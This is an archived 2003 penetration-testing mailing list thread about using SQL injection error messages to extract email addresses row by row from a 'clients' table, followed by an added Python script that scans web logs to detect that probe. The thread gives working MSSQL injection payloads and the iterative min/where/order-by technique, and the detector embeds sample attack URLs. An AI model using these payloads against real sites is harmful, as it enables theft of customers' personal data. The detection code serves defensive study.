Penetration Testing mailing list archives
RE: SQL injection - get more values
From: "Brass, Phil (ISS Atlanta)" <PBrass () iss net>
Date: Wed, 12 Feb 2003 14:05:02 -0500
I believe the solution you're looking for is the old min-where-order-by trick.

' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

Try this:

' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a' order by 1)) %2b '

After you get the first value (say it's anon () isp com), you throw it into the where clause:

' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'anon () isp com' order by 1)) %2b '

You get the next value, say it's axon () isp com, then you do the next query:

' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'axon () isp com' order by 1)) %2b '

And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you.

Phil

-----Original Message-----
From: Daniel Savi [mailto:dss () brturbo com]
Sent: Wednesday, February 12, 2003 12:49 PM
To: pen-test () securityfocus com
Subject: SQL injection - get more values

Hi :)

I'm trying to get some info from the clients table and email field....

I tried this param in gubpage.asp?=...

') union select sum(email) from clients--

and got an error about all queries needed... so I tried to solve it with

') union select sum(email),1,1,1.... from clients--

until I got:

operand type clash: text is incompatible with int

I found this answer in this forum (thanks :)), which was:

' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

I got this:

Syntax error converting the varchar value 'anon () isp com' to a column of data type int

Now, my problem: how can I get another e-mail from the table knowing one valid value?

I tried this:

' %2b convert(int, (SELECT email FROM clients WHERE email'anon () isp com')) %2b '

but no success. I think I can use NOT IN, but I'm not sure how to use it with convert...

Any tips are welcome!

Thanks

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
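
Added example, not part of the original message or thread: a defender-side check that scans web request logs for the conversion-error probe quoted above and flags a client whose probes walk through successive comparison values. The page.asp?id= parameter, the IP addresses, the cursor values and the min_steps threshold are all assumptions made for the sample.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# convert(int, (SELECT ...)) inside a request parameter: the type-conversion
# error probe quoted in the thread.
PROBE = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.IGNORECASE)
# String literal after '>' that advances on every step of the min/where walk.
CURSOR = re.compile(r">\s*'([^']*)'")


def find_enumeration(entries, min_steps=3):
    """Report clients whose requests carry conversion-error probes.

    entries: iterable of (client_ip, raw_request_target) pairs.
    A client is marked "enumerating" once its probes contain at least
    min_steps distinct cursor literals (min_steps is an assumed threshold).
    """
    probes = defaultdict(int)
    cursors = defaultdict(set)
    for client, target in entries:
        decoded = unquote_plus(target)  # %2b -> '+', %20 and '+' -> ' '
        if not PROBE.search(decoded):
            continue
        probes[client] += 1
        cursors[client].update(CURSOR.findall(decoded))
    return {
        client: {
            "probes": count,
            "distinct_cursors": len(cursors[client]),
            "enumerating": len(cursors[client]) >= min_steps,
        }
        for client, count in probes.items()
    }


# Constructed sample entries: documentation IPs, hypothetical page.asp?id=
# parameter, placeholder cursor values. Not taken from any real log.
TEMPLATE = ("/page.asp?id='%20%2b%20convert(int,%20(SELECT%20min(email)%20FROM%20"
            "clients%20WHERE%20email%20>%20'{}'%20order%20by%201))%20%2b%20'")
SAMPLE = [
    ("198.51.100.9", "/page.asp?id=42"),
    ("203.0.113.7", TEMPLATE.format("a")),
    ("203.0.113.7", TEMPLATE.format("value-1")),
    ("203.0.113.7", TEMPLATE.format("value-2")),
    ("192.0.2.5", TEMPLATE.format("a")),
]

if __name__ == "__main__":
    for client, report in find_enumeration(SAMPLE).items():
        print(client, report)
```

A single probe is typical of a scanner; the changing literal after `>` across requests from one client is what distinguishes the value-by-value walk described in the message.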